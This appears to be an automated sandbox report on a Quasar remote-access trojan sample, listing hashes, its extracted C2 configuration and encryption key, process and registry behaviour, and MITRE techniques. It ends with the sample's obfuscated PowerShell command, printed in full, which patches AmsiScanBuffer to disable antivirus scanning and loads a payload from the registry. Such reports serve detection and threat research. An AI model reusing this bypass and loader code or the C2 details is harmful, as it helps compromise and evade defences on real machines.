quasar | 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

General

Target

Uni.bat
Size

515KB
MD5

4c2a3be3d5c9464eb441677e41f44fd8
SHA1

c826034a0882d21a39056d745e88622ee9698343
SHA256

45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512

ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP

12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

review-tops.gl.at.ply.gg:48212

Mutex

$Sxr-IGnkORFTlshRl7BdTw

Attributes

encryption_key
YDmRBA8wExjQkYgGrHhN
install_name
$sxr-powershell.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Discord
subdirectory
$77

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral4/memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2644 created 644 2644 powershell.EXE winlogon.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

2 480 powershell.exe
4 480 powershell.exe
5 480 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

480 powershell.exe
3552 powershell.exe
3276 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

$sxr-powershell.exeinstall.exe

pid process

5060 $sxr-powershell.exe
244 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 raw.githubusercontent.com
3 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 2644 created 644	2644	powershell.EXE	winlogon.exe

flow	pid	process
2	480	powershell.exe
4	480	powershell.exe
5	480	powershell.exe

pid	process
480	powershell.exe
3552	powershell.exe
3276	powershell.exe

pid	process
5060	$sxr-powershell.exe
244	install.exe

flow	ioc
5	raw.githubusercontent.com
3	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2644 set thread context of 1156 2644 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4744 schtasks.exe

description	pid	process	target process
PID 2644 set thread context of 1156	2644	powershell.EXE	dllhost.exe

pid	process
4744	schtasks.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715728046"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:07:27 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings powershell.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-powershell.exepowershell.EXEdllhost.exe

pid	process
3552	powershell.exe
3552	powershell.exe
3276	powershell.exe
3276	powershell.exe
480	powershell.exe
480	powershell.exe
5060	$sxr-powershell.exe
5060	$sxr-powershell.exe
2644	powershell.EXE
2644	powershell.EXE
2644	powershell.EXE
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe
1156	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	powershell.exe
Token: SeSecurityPrivilege	3276	powershell.exe
Token: SeTakeOwnershipPrivilege	3276	powershell.exe
Token: SeLoadDriverPrivilege	3276	powershell.exe
Token: SeSystemProfilePrivilege	3276	powershell.exe
Token: SeSystemtimePrivilege	3276	powershell.exe
Token: SeProfSingleProcessPrivilege	3276	powershell.exe
Token: SeIncBasePriorityPrivilege	3276	powershell.exe
Token: SeCreatePagefilePrivilege	3276	powershell.exe
Token: SeBackupPrivilege	3276	powershell.exe
Token: SeRestorePrivilege	3276	powershell.exe
Token: SeShutdownPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeSystemEnvironmentPrivilege	3276	powershell.exe
Token: SeRemoteShutdownPrivilege	3276	powershell.exe
Token: SeUndockPrivilege	3276	powershell.exe
Token: SeManageVolumePrivilege	3276	powershell.exe
Token: 33	3276	powershell.exe
Token: 34	3276	powershell.exe
Token: 35	3276	powershell.exe
Token: 36	3276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	powershell.exe
Token: SeSecurityPrivilege	3276	powershell.exe
Token: SeTakeOwnershipPrivilege	3276	powershell.exe
Token: SeLoadDriverPrivilege	3276	powershell.exe
Token: SeSystemProfilePrivilege	3276	powershell.exe
Token: SeSystemtimePrivilege	3276	powershell.exe
Token: SeProfSingleProcessPrivilege	3276	powershell.exe
Token: SeIncBasePriorityPrivilege	3276	powershell.exe
Token: SeCreatePagefilePrivilege	3276	powershell.exe
Token: SeBackupPrivilege	3276	powershell.exe
Token: SeRestorePrivilege	3276	powershell.exe
Token: SeShutdownPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeSystemEnvironmentPrivilege	3276	powershell.exe
Token: SeRemoteShutdownPrivilege	3276	powershell.exe
Token: SeUndockPrivilege	3276	powershell.exe
Token: SeManageVolumePrivilege	3276	powershell.exe
Token: 33	3276	powershell.exe
Token: 34	3276	powershell.exe
Token: 35	3276	powershell.exe
Token: 36	3276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	powershell.exe
Token: SeSecurityPrivilege	3276	powershell.exe
Token: SeTakeOwnershipPrivilege	3276	powershell.exe
Token: SeLoadDriverPrivilege	3276	powershell.exe
Token: SeSystemProfilePrivilege	3276	powershell.exe
Token: SeSystemtimePrivilege	3276	powershell.exe
Token: SeProfSingleProcessPrivilege	3276	powershell.exe
Token: SeIncBasePriorityPrivilege	3276	powershell.exe
Token: SeCreatePagefilePrivilege	3276	powershell.exe
Token: SeBackupPrivilege	3276	powershell.exe
Token: SeRestorePrivilege	3276	powershell.exe
Token: SeShutdownPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeSystemEnvironmentPrivilege	3276	powershell.exe
Token: SeRemoteShutdownPrivilege	3276	powershell.exe
Token: SeUndockPrivilege	3276	powershell.exe
Token: SeManageVolumePrivilege	3276	powershell.exe
Token: 33	3276	powershell.exe
Token: 34	3276	powershell.exe
Token: 35	3276	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 3056 wrote to memory of 2740	3056	cmd.exe	net.exe
PID 3056 wrote to memory of 2740	3056	cmd.exe	net.exe
PID 2740 wrote to memory of 3492	2740	net.exe	net1.exe
PID 2740 wrote to memory of 3492	2740	net.exe	net1.exe
PID 3056 wrote to memory of 3552	3056	cmd.exe	powershell.exe
PID 3056 wrote to memory of 3552	3056	cmd.exe	powershell.exe
PID 3056 wrote to memory of 3552	3056	cmd.exe	powershell.exe
PID 3552 wrote to memory of 3276	3552	powershell.exe	powershell.exe
PID 3552 wrote to memory of 3276	3552	powershell.exe	powershell.exe
PID 3552 wrote to memory of 3276	3552	powershell.exe	powershell.exe
PID 3552 wrote to memory of 8	3552	powershell.exe	WScript.exe
PID 3552 wrote to memory of 8	3552	powershell.exe	WScript.exe
PID 3552 wrote to memory of 8	3552	powershell.exe	WScript.exe
PID 8 wrote to memory of 2876	8	WScript.exe	cmd.exe
PID 8 wrote to memory of 2876	8	WScript.exe	cmd.exe
PID 8 wrote to memory of 2876	8	WScript.exe	cmd.exe
PID 2876 wrote to memory of 4792	2876	cmd.exe	net.exe
PID 2876 wrote to memory of 4792	2876	cmd.exe	net.exe
PID 2876 wrote to memory of 4792	2876	cmd.exe	net.exe
PID 4792 wrote to memory of 2008	4792	net.exe	net1.exe
PID 4792 wrote to memory of 2008	4792	net.exe	net1.exe
PID 4792 wrote to memory of 2008	4792	net.exe	net1.exe
PID 2876 wrote to memory of 480	2876	cmd.exe	powershell.exe
PID 2876 wrote to memory of 480	2876	cmd.exe	powershell.exe
PID 2876 wrote to memory of 480	2876	cmd.exe	powershell.exe
PID 480 wrote to memory of 4744	480	powershell.exe	schtasks.exe
PID 480 wrote to memory of 4744	480	powershell.exe	schtasks.exe
PID 480 wrote to memory of 4744	480	powershell.exe	schtasks.exe
PID 480 wrote to memory of 5060	480	powershell.exe	$sxr-powershell.exe
PID 480 wrote to memory of 5060	480	powershell.exe	$sxr-powershell.exe
PID 480 wrote to memory of 5060	480	powershell.exe	$sxr-powershell.exe
PID 480 wrote to memory of 244	480	powershell.exe	install.exe
PID 480 wrote to memory of 244	480	powershell.exe	install.exe
PID 480 wrote to memory of 244	480	powershell.exe	install.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 2644 wrote to memory of 1156	2644	powershell.EXE	dllhost.exe
PID 1156 wrote to memory of 644	1156	dllhost.exe	winlogon.exe
PID 1156 wrote to memory of 700	1156	dllhost.exe	lsass.exe
PID 1156 wrote to memory of 996	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 436	1156	dllhost.exe	dwm.exe
PID 1156 wrote to memory of 460	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 416	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1040	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1060	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1100	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1216	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1252	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1308	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1360	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1396	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1428	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1472	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1496	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1664	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1708	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1748	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1756	1156	dllhost.exe	svchost.exe
PID 1156 wrote to memory of 1844	1156	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:644

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:436

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3d293ea8-3858-44ad-bcc9-9f98bbd867ae}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gvDVrbVNbelO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZRhNPvmbYtFmMR,[Parameter(Position=1)][Type]$xuiWXuSEHt)$LAAYmLRettP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'tedD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+'l'+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$LAAYmLRettP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+'i'+''+'a'+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZRhNPvmbYtFmMR).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$LAAYmLRettP.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'deBy'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+[Char](83)+'l'+'o'+''+'t'+',V'+'i'+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$xuiWXuSEHt,$ZRhNPvmbYtFmMR).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $LAAYmLRettP.CreateType();}$ePtTIHkyhOuYn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Win'+'3'+'2'+[Char](46)+'Uns'+'a'+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$pbbugAOWrjszIp=$ePtTIHkyhOuYn.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gvaflfonItCtTVaAdLp=gvDVrbVNbelO @([String])([IntPtr]);$stLbebnzurNRbTNHGzQwQM=gvDVrbVNbelO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZWUjVVOCYrA=$ePtTIHkyhOuYn.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZIiBEnEwJgBaMP=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$xxypUFDLXWklvNWZS=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'te'+'c'+''+'t'+'')));$tWIAwJz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZIiBEnEwJgBaMP,$gvaflfonItCtTVaAdLp).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$jDHOaNrHqDHLOdmNd=$pbbugAOWrjszIp.Invoke($Null,@([Object]$tWIAwJz,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+'f'+[Char](102)+'er')));$HQzkNVLxWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,4,[ref]$HQzkNVLxWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jDHOaNrHqDHLOdmNd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,0x20,[ref]$HQzkNVLxWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[C